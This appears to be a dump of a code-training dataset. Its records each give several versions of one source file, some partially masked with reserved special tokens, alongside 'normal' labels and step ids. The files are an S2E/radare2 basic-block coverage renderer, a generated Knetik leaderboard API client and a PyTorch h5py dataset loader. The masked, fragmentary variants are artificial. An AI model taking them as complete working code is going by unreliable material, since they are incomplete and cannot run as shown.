Basic blocks\n that were executed by S2E are coloured green.\n\n The resulting SVG images are written to `output_dir`.\n \"\"\"\n for func_addr in function_addrs(r2):\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n continue\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name,\n func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)\n\n\ndef generate_graph(s2e_output_dir, s2e_num, project_name):\n \"\"\"\n Generate the PNG graph for the analysis in the output_dir\n \"\"\"\n s2e_env_path = S2E_settings.S2E_ENVIRONMENT_FOLDER_PATH\n output_dir = os.path.join(s2e_output_dir, 'functions')\n os.makedirs(output_dir)\n if not os.path.isfile(os.path.join(s2e_env_path, 's2e.yaml')):\n print('ERROR: %s is not an S2E environment' % s2e_env_path)\n return\n project_path = os.path.join(s2e_env_path, 'projects', project_name)\n if not os.path.isdir(project_path):\n print('ERROR: %s is not a valid project' % project_name)\n return\n if not os.path.isdir(output_dir):\n print('ERROR: %s is not a valid output directory' % output_dir)\n return\n s2e_last_path = os.path.join(project_path, 's2e-last')\n if not os.path.isdir(s2e_last_path):\n print('ERROR: %s has no s2e-last' % project_name)\n return\n tb_coverage_files = glob.glob(os.path.join(s2e_last_path, '*',\n 'tbcoverage-*.json')) + glob.glob(os.path.join(s2e_last_path,\n 'tbcoverage-*.json'))\n if not tb_coverage_files:\n print(\n 'ERROR: No translation block coverage files found in s2e-last. 
Did you enable the ``TranslationBlockCoverage`` plugin in s2e-config.lua?'\n )\n return\n covered_tbs = set()\n for tb_coverage_file in tb_coverage_files:\n tb_coverage_data = parse_tb_file(tb_coverage_file, project_name)\n if not tb_coverage_data:\n continue\n covered_tbs.update((start, end) for start, end, _ in tb_coverage_data)\n r2 = r2pipe.open(os.path.join(project_path, project_name))\n r2.cmd('aaa')\n covered_bbs = basic_block_coverage(r2, covered_tbs)\n render_functions(r2, covered_bbs, output_dir)\n base_path = os.path.join(project_name, 's2e-out-%d' % s2e_num, 'functions')\n return [[file_[0:-4], os.path.join(base_path, file_)] for file_ in os.\n listdir(output_dir)]\n",
"step-5": "\"\"\"\nCopyright (C) Adrian Herrera, 2017\n\nYou will need to install r2pipe and pydot:\n\n```\npip install r2pipe pydot\n```\n\"\"\"\n\nfrom __future__ import print_function\n\nimport glob\nimport json\nimport os\n\nimport pydot\nimport r2pipe\nimport s2e_web.S2E_settings as S2E_settings\n\n\ndef function_addrs(r2):\n \"\"\"\n Yield a list of all the function's start addresses.\n \"\"\"\n for addr in r2.cmdj('aflqj'):\n yield int(addr, 16)\n\n\ndef parse_tb_file(path, module):\n \"\"\"\n Parse a translation block coverage file generated by S2E's\n ``TranslationBlockCoverage`` plugin.\n \"\"\"\n with open(path, 'r') as f:\n try:\n tb_coverage_data = json.load(f)\n except Exception:\n print('WARN: Failed to parse translation block JSON file %s' % path)\n return None\n\n if not tb_coverage_data:\n print('WARN: Translation block JSON file %s is empty' % path)\n return None\n\n if module not in tb_coverage_data:\n print('WARN: Target %s not found in translation block JSON file %s' %\n (module, path))\n return None\n\n return tb_coverage_data[module]\n\n\ndef basic_block_coverage(r2, translation_blocks):\n \"\"\"\n Calculate the basic block coverage based on the covered TBs.\n\n Returns a set of *covered* basic block start addresses\n \"\"\"\n covered_bbs = set()\n\n for func_addr in function_addrs(r2):\n graph = r2.cmdj('agj 0x%x' % func_addr)\n assert len(graph) == 1\n graph = graph[0]\n\n for tb_start_addr, tb_end_addr in translation_blocks:\n for bb in graph['blocks']:\n bb_start_addr = bb['offset']\n bb_end_addr = bb_start_addr + bb['size']\n\n # Check if the translation block falls within a basic block OR\n # a basic block falls within a translation block\n if (bb_end_addr >= tb_start_addr >= bb_start_addr or\n bb_start_addr <= tb_end_addr <= bb_end_addr):\n covered_bbs.add(bb_start_addr)\n\n return covered_bbs\n\n\ndef render_functions(r2, covered_bbs, output_dir):\n \"\"\"\n Renders SVG graphs of each of the functions in the program. 
Basic blocks\n that were executed by S2E are coloured green.\n\n The resulting SVG images are written to `output_dir`.\n \"\"\"\n for func_addr in function_addrs(r2):\n # Get the function name\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n # XXX This is very hacky - need something more robust\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n # Node name is not a hex string\n continue\n\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name, func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)\n\n\ndef generate_graph(s2e_output_dir, s2e_num, project_name):\n \"\"\"\n Generate the PNG graph for the analysis in the output_dir\n \"\"\"\n\n s2e_env_path = S2E_settings.S2E_ENVIRONMENT_FOLDER_PATH\n output_dir = os.path.join(s2e_output_dir, 'functions')\n os.makedirs(output_dir)\n\n # Check that the given S2E environment is legitimate\n if not os.path.isfile(os.path.join(s2e_env_path, 's2e.yaml')):\n print('ERROR: %s is not an S2E environment' % s2e_env_path)\n return\n\n # Check that the given project exists in the environment\n project_path = os.path.join(s2e_env_path, 'projects', project_name)\n if not os.path.isdir(project_path):\n print('ERROR: %s is not a valid project' % project_name)\n return\n\n # Check that the output directory exists\n if not os.path.isdir(output_dir):\n print('ERROR: %s is not a valid output directory' % output_dir)\n return\n\n # Check that the project has been executed at least once\n s2e_last_path = os.path.join(project_path, 's2e-last')\n if not os.path.isdir(s2e_last_path):\n print('ERROR: %s has no s2e-last' % project_name)\n return\n\n # Get 
all the TB coverage files\n tb_coverage_files = glob.glob(os.path.join(s2e_last_path, '*', 'tbcoverage-*.json')) + \\\n glob.glob(os.path.join(s2e_last_path, 'tbcoverage-*.json'))\n if not tb_coverage_files:\n print('ERROR: No translation block coverage files found in s2e-last. '\n 'Did you enable the ``TranslationBlockCoverage`` plugin in '\n 's2e-config.lua?')\n return\n\n # Parse the TB coverage files\n covered_tbs = set()\n for tb_coverage_file in tb_coverage_files:\n # XXX A project can have a different name to the target program\n tb_coverage_data = parse_tb_file(tb_coverage_file, project_name)\n if not tb_coverage_data:\n continue\n\n covered_tbs.update((start, end) for start, end, _ in tb_coverage_data)\n\n # Open the program in Radare and do the initial analysis\n # XXX A project can have a different name to the target program\n r2 = r2pipe.open(os.path.join(project_path, project_name))\n r2.cmd('aaa')\n\n # Calculate the basic block coverage and render the information as a set\n # of PNG images for each function\n covered_bbs = basic_block_coverage(r2, covered_tbs)\n render_functions(r2, covered_bbs, output_dir)\n\n base_path = os.path.join(project_name, 's2e-out-%d' % s2e_num, 'functions')\n return [[file_[0:-4], os.path.join(base_path, file_)] for file_ in os.listdir(output_dir)]\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# coding: utf-8
"""
Knetik Platform API Documentation latest
This is the spec for the Knetik API. Use this in conjunction with the documentation found at https://knetikcloud.com.
OpenAPI spec version: latest
Contact: support@knetik.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..api_client import ApiClient
class GamificationLeaderboardsApi(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # Fall back to a default-configured client when none is supplied
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def get_leaderboard(self, context_type, context_id, **kwargs):
        """
        Retrieves leaderboard details and paginated entries
        The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. Sorting is based on the fields of LeaderboardEntryResource rather than the returned LeaderboardResource. <br><br><b>Permissions Needed:</b> ANY
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.get_leaderboard(context_type, context_id, async=True)
        >>> result = thread.get()

        :param async bool
        :param str context_type: The context type for the leaderboard (required)
        :param str context_id: The context id for the leaderboard (required)
        :param int size: The number of objects returned per page
        :param int page: The number of the page returned, starting with 1
        :param str order: A comma separated list of sorting requirements in priority order, each entry matching PROPERTY_NAME:[ASC|DESC]
        :return: LeaderboardResource
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.get_leaderboard_with_http_info(context_type, context_id, **kwargs)
        else:
            (data) = self.get_leaderboard_with_http_info(context_type, context_id, **kwargs)
            return data

    def get_leaderboard_with_http_info(self, context_type, context_id, **kwargs):
        """
        Retrieves leaderboard details and paginated entries
        The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. Sorting is based on the fields of LeaderboardEntryResource rather than the returned LeaderboardResource. <br><br><b>Permissions Needed:</b> ANY
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.get_leaderboard_with_http_info(context_type, context_id, async=True)
        >>> result = thread.get()

        :param async bool
        :param str context_type: The context type for the leaderboard (required)
        :param str context_id: The context id for the leaderboard (required)
        :param int size: The number of objects returned per page
        :param int page: The number of the page returned, starting with 1
        :param str order: A comma separated list of sorting requirements in priority order, each entry matching PROPERTY_NAME:[ASC|DESC]
        :return: LeaderboardResource
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['context_type', 'context_id', 'size', 'page', 'order']
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_leaderboard" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'context_type' is set
        if ('context_type' not in params) or (params['context_type'] is None):
            raise ValueError("Missing the required parameter `context_type` when calling `get_leaderboard`")
        # verify the required parameter 'context_id' is set
        if ('context_id' not in params) or (params['context_id'] is None):
            raise ValueError("Missing the required parameter `context_id` when calling `get_leaderboard`")

        collection_formats = {}

        path_params = {}
        if 'context_type' in params:
            path_params['context_type'] = params['context_type']
        if 'context_id' in params:
            path_params['context_id'] = params['context_id']

        query_params = []
        if 'size' in params:
            query_params.append(('size', params['size']))
        if 'page' in params:
            query_params.append(('page', params['page']))
        if 'order' in params:
            query_params.append(('order', params['order']))

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # Authentication setting
        auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']

        # NOTE: 'async' became a reserved keyword in Python 3.7, so it can no
        # longer be written as a literal keyword argument (SyntaxError). Pass
        # it via dict unpacking instead; call_api still receives the same
        # 'async' keyword.
        return self.api_client.call_api('/leaderboards/{context_type}/{context_id}', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='LeaderboardResource',
                                        auth_settings=auth_settings,
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats,
                                        **{'async': params.get('async')})

    def get_leaderboard_rank(self, context_type, context_id, id, **kwargs):
        """
        Retrieves a specific user entry with rank
        The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. <br><br><b>Permissions Needed:</b> ANY
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.get_leaderboard_rank(context_type, context_id, id, async=True)
        >>> result = thread.get()

        :param async bool
        :param str context_type: The context type for the leaderboard (required)
        :param str context_id: The context id for the leaderboard (required)
        :param str id: The id of a user (required)
        :return: LeaderboardEntryResource
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.get_leaderboard_rank_with_http_info(context_type, context_id, id, **kwargs)
        else:
            (data) = self.get_leaderboard_rank_with_http_info(context_type, context_id, id, **kwargs)
            return data

    def get_leaderboard_rank_with_http_info(self, context_type, context_id, id, **kwargs):
        """
        Retrieves a specific user entry with rank
        The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. <br><br><b>Permissions Needed:</b> ANY
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.get_leaderboard_rank_with_http_info(context_type, context_id, id, async=True)
        >>> result = thread.get()

        :param async bool
        :param str context_type: The context type for the leaderboard (required)
        :param str context_id: The context id for the leaderboard (required)
        :param str id: The id of a user (required)
        :return: LeaderboardEntryResource
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['context_type', 'context_id', 'id']
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_leaderboard_rank" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'context_type' is set
        if ('context_type' not in params) or (params['context_type'] is None):
            raise ValueError("Missing the required parameter `context_type` when calling `get_leaderboard_rank`")
        # verify the required parameter 'context_id' is set
        if ('context_id' not in params) or (params['context_id'] is None):
            raise ValueError("Missing the required parameter `context_id` when calling `get_leaderboard_rank`")
        # verify the required parameter 'id' is set
        if ('id' not in params) or (params['id'] is None):
            raise ValueError("Missing the required parameter `id` when calling `get_leaderboard_rank`")

        collection_formats = {}

        path_params = {}
        if 'context_type' in params:
            path_params['context_type'] = params['context_type']
        if 'context_id' in params:
            path_params['context_id'] = params['context_id']
        if 'id' in params:
            path_params['id'] = params['id']

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # Authentication setting
        auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']

        # 'async' is a reserved keyword from Python 3.7; see note above.
        return self.api_client.call_api('/leaderboards/{context_type}/{context_id}/users/{id}/rank', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='LeaderboardEntryResource',
                                        auth_settings=auth_settings,
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats,
                                        **{'async': params.get('async')})

    def get_leaderboard_strategies(self, **kwargs):
        """
        Get a list of available leaderboard strategy names
        <b>Permissions Needed:</b> ANY
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.get_leaderboard_strategies(async=True)
        >>> result = thread.get()

        :param async bool
        :return: list[str]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.get_leaderboard_strategies_with_http_info(**kwargs)
        else:
            (data) = self.get_leaderboard_strategies_with_http_info(**kwargs)
            return data

    def get_leaderboard_strategies_with_http_info(self, **kwargs):
        """
        Get a list of available leaderboard strategy names
        <b>Permissions Needed:</b> ANY
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.get_leaderboard_strategies_with_http_info(async=True)
        >>> result = thread.get()

        :param async bool
        :return: list[str]
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = []
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_leaderboard_strategies" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # Authentication setting
        auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']

        # 'async' is a reserved keyword from Python 3.7; see note above.
        return self.api_client.call_api('/leaderboards/strategies', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='list[str]',
                                        auth_settings=auth_settings,
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats,
                                        **{'async': params.get('async')})
|
normal
|
{
"blob_id": "05aec07b94f3363e07d8740b102262d817e08e71",
"index": 1253,
"step-1": "# coding: utf-8\n\n\"\"\"\n Knetik Platform API Documentation latest \n\n This is the spec for the Knetik API. Use this in conjunction with the documentation found at https://knetikcloud.com.\n\n OpenAPI spec version: latest \n Contact: support@knetik.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport sys\nimport os\nimport re\n\n# python 2 and python 3 compatibility library\nfrom six import iteritems\n\nfrom ..api_client import ApiClient\n\n\nclass GamificationLeaderboardsApi(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n Ref: https://github.com/swagger-api/swagger-codegen\n \"\"\"\n\n def __init__(self, api_client=None):\n if api_client is None:\n api_client = ApiClient()\n self.api_client = api_client\n\n def get_leaderboard(self, context_type, context_id, **kwargs):\n \"\"\"\n Retrieves leaderboard details and paginated entries\n The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. Sorting is based on the fields of LeaderboardEntryResource rather than the returned LeaderboardResource. <br><br><b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. 
To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard(context_type, context_id, async=True)\n >>> result = thread.get()\n\n :param async bool\n :param str context_type: The context type for the leaderboard (required)\n :param str context_id: The context id for the leaderboard (required)\n :param int size: The number of objects returned per page\n :param int page: The number of the page returned, starting with 1\n :param str order: A comma separated list of sorting requirements in priority order, each entry matching PROPERTY_NAME:[ASC|DESC]\n :return: LeaderboardResource\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async'):\n return self.get_leaderboard_with_http_info(context_type, context_id, **kwargs)\n else:\n (data) = self.get_leaderboard_with_http_info(context_type, context_id, **kwargs)\n return data\n\n def get_leaderboard_with_http_info(self, context_type, context_id, **kwargs):\n \"\"\"\n Retrieves leaderboard details and paginated entries\n The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. Sorting is based on the fields of LeaderboardEntryResource rather than the returned LeaderboardResource. <br><br><b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. 
To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard_with_http_info(context_type, context_id, async=True)\n >>> result = thread.get()\n\n :param async bool\n :param str context_type: The context type for the leaderboard (required)\n :param str context_id: The context id for the leaderboard (required)\n :param int size: The number of objects returned per page\n :param int page: The number of the page returned, starting with 1\n :param str order: A comma separated list of sorting requirements in priority order, each entry matching PROPERTY_NAME:[ASC|DESC]\n :return: LeaderboardResource\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = ['context_type', 'context_id', 'size', 'page', 'order']\n all_params.append('async')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method get_leaderboard\" % key\n )\n params[key] = val\n del params['kwargs']\n # verify the required parameter 'context_type' is set\n if ('context_type' not in params) or (params['context_type'] is None):\n raise ValueError(\"Missing the required parameter `context_type` when calling `get_leaderboard`\")\n # verify the required parameter 'context_id' is set\n if ('context_id' not in params) or (params['context_id'] is None):\n raise ValueError(\"Missing the required parameter `context_id` when calling `get_leaderboard`\")\n\n\n collection_formats = {}\n\n path_params = {}\n if 'context_type' in params:\n path_params['context_type'] = params['context_type']\n if 'context_id' in params:\n path_params['context_id'] = params['context_id']\n\n query_params = []\n if 'size' in params:\n query_params.append(('size', params['size']))\n if 'page' in params:\n 
query_params.append(('page', params['page']))\n if 'order' in params:\n query_params.append(('order', params['order']))\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n\n # Authentication setting\n auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']\n\n return self.api_client.call_api('/leaderboards/{context_type}/{context_id}', 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='LeaderboardResource',\n auth_settings=auth_settings,\n async=params.get('async'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_leaderboard_rank(self, context_type, context_id, id, **kwargs):\n \"\"\"\n Retrieves a specific user entry with rank\n The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. <br><br><b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. 
To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard_rank(context_type, context_id, id, async=True)\n >>> result = thread.get()\n\n :param async bool\n :param str context_type: The context type for the leaderboard (required)\n :param str context_id: The context id for the leaderboard (required)\n :param str id: The id of a user (required)\n :return: LeaderboardEntryResource\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async'):\n return self.get_leaderboard_rank_with_http_info(context_type, context_id, id, **kwargs)\n else:\n (data) = self.get_leaderboard_rank_with_http_info(context_type, context_id, id, **kwargs)\n return data\n\n def get_leaderboard_rank_with_http_info(self, context_type, context_id, id, **kwargs):\n \"\"\"\n Retrieves a specific user entry with rank\n The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. <br><br><b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. 
To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard_rank_with_http_info(context_type, context_id, id, async=True)\n >>> result = thread.get()\n\n :param async bool\n :param str context_type: The context type for the leaderboard (required)\n :param str context_id: The context id for the leaderboard (required)\n :param str id: The id of a user (required)\n :return: LeaderboardEntryResource\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = ['context_type', 'context_id', 'id']\n all_params.append('async')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method get_leaderboard_rank\" % key\n )\n params[key] = val\n del params['kwargs']\n # verify the required parameter 'context_type' is set\n if ('context_type' not in params) or (params['context_type'] is None):\n raise ValueError(\"Missing the required parameter `context_type` when calling `get_leaderboard_rank`\")\n # verify the required parameter 'context_id' is set\n if ('context_id' not in params) or (params['context_id'] is None):\n raise ValueError(\"Missing the required parameter `context_id` when calling `get_leaderboard_rank`\")\n # verify the required parameter 'id' is set\n if ('id' not in params) or (params['id'] is None):\n raise ValueError(\"Missing the required parameter `id` when calling `get_leaderboard_rank`\")\n\n\n collection_formats = {}\n\n path_params = {}\n if 'context_type' in params:\n path_params['context_type'] = params['context_type']\n if 'context_id' in params:\n path_params['context_id'] = params['context_id']\n if 'id' in params:\n path_params['id'] = params['id']\n\n query_params = []\n\n header_params = {}\n\n form_params = []\n local_var_files = 
{}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n\n # Authentication setting\n auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']\n\n return self.api_client.call_api('/leaderboards/{context_type}/{context_id}/users/{id}/rank', 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='LeaderboardEntryResource',\n auth_settings=auth_settings,\n async=params.get('async'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_leaderboard_strategies(self, **kwargs):\n \"\"\"\n Get a list of available leaderboard strategy names\n <b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard_strategies(async=True)\n >>> result = thread.get()\n\n :param async bool\n :return: list[str]\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async'):\n return self.get_leaderboard_strategies_with_http_info(**kwargs)\n else:\n (data) = self.get_leaderboard_strategies_with_http_info(**kwargs)\n return data\n\n def get_leaderboard_strategies_with_http_info(self, **kwargs):\n \"\"\"\n Get a list of available leaderboard strategy names\n <b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. 
To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard_strategies_with_http_info(async=True)\n >>> result = thread.get()\n\n :param async bool\n :return: list[str]\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = []\n all_params.append('async')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method get_leaderboard_strategies\" % key\n )\n params[key] = val\n del params['kwargs']\n\n collection_formats = {}\n\n path_params = {}\n\n query_params = []\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n\n # Authentication setting\n auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']\n\n return self.api_client.call_api('/leaderboards/strategies', 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='list[str]',\n auth_settings=auth_settings,\n async=params.get('async'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class TorchData(Dataset):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_gt_mask(vocal_spec, bg_spec):
"""
Take in log spectrogram and return a mask map for TF bins
1 if the vocal sound is dominated in the TF-bin, while 0 for not
"""
vocal_spec = vocal_spec.numpy()
bg_spec = bg_spec.numpy()
return np.array(vocal_spec > bg_spec, dtype=np.float32)
class TorchData(Dataset):
def __init__(self, dataset_path):
"""
Take the h5py dataset
"""
super(TorchData, self).__init__()
self.dataset = h5py.File(dataset_path, 'r')
self.bg = self.dataset['bg']
self.vocal = self.dataset['vocal']
self.mix = self.dataset['mix']
self.len = self.bg.shape[0]
def __len__(self):
return self.len
def __getitem__(self, index):
bg = self.bg[index].astype(np.float32)
vocal = self.vocal[index].astype(np.float32)
mix = self.mix[index].astype(np.float32)
mix = torch.from_numpy(mix)
bg = torch.from_numpy(bg)
vocal = torch.from_numpy(vocal)
target = torch.from_numpy(create_gt_mask(vocal, bg))
sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}
return sample
def torch_dataset_loader(dataset, batch_size, shuffle, kwargs):
"""
take the h5py dataset
"""
loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=
shuffle, **kwargs)
return loader
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_gt_mask(vocal_spec, bg_spec):
"""
Take in log spectrogram and return a mask map for TF bins
1 if the vocal sound is dominated in the TF-bin, while 0 for not
"""
vocal_spec = vocal_spec.numpy()
bg_spec = bg_spec.numpy()
return np.array(vocal_spec > bg_spec, dtype=np.float32)
class TorchData(Dataset):
def __init__(self, dataset_path):
"""
Take the h5py dataset
"""
super(TorchData, self).__init__()
self.dataset = h5py.File(dataset_path, 'r')
self.bg = self.dataset['bg']
self.vocal = self.dataset['vocal']
self.mix = self.dataset['mix']
self.len = self.bg.shape[0]
def __len__(self):
return self.len
def __getitem__(self, index):
bg = self.bg[index].astype(np.float32)
vocal = self.vocal[index].astype(np.float32)
